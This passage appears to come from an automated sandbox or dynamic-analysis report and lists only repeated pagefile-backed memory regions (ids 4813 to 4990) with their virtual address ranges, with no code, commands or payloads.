0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4813 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4814 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4815 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4816 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4817 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4818 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4819 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4820 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4821 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4822 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4823 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4824 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4825 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4826 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4827 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4828 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4829 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4830 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4831 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4832 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4833 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4834 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4835 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4836 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4837 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4838 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4839 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4840 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4841 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4842 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4843 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4844 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4845 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4846 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4847 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4848 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4849 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4850 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4851 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4852 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4853 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4854 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4855 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4856 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4857 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4858 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4859 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4860 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4861 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4862 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4863 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4864 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4865 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4866 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4867 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4868 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4869 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4870 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4871 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4872 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4873 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4874 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4875 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4876 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4877 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4878 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4879 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4880 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4881 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4882 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4883 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4884 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4885 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4886 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4887 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4888 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4889 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4890 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4891 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4892 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4893 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4894 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4895 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4896 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4897 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4898 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4899 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4900 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4901 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4902 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4903 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4904 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4905 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4906 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4907 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4908 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4909 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4910 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4911 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4912 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4913 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4914 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4915 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4916 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4917 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4918 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4919 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4920 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4921 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4922 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4923 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4924 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4925 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4926 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4927 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4928 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4929 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4930 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4931 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4932 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4933 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4934 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4935 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4936 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4937 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4938 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4939 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4940 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4941 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4942 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4943 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4944 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4945 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4946 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4947 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4948 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4949 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4950 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4951 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4952 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4953 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4954 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4955 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4956 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4957 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4958 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4959 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4960 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4961 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4962 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4963 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4964 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4965 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4966 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4967 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4968 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4969 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4970 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4971 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4972 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4973 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4974 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4975 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4976 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4977 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4978 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4979 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4980 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4981 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4982 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4983 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4984 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4985 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4986 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4987 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4988 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4989 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4990 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed 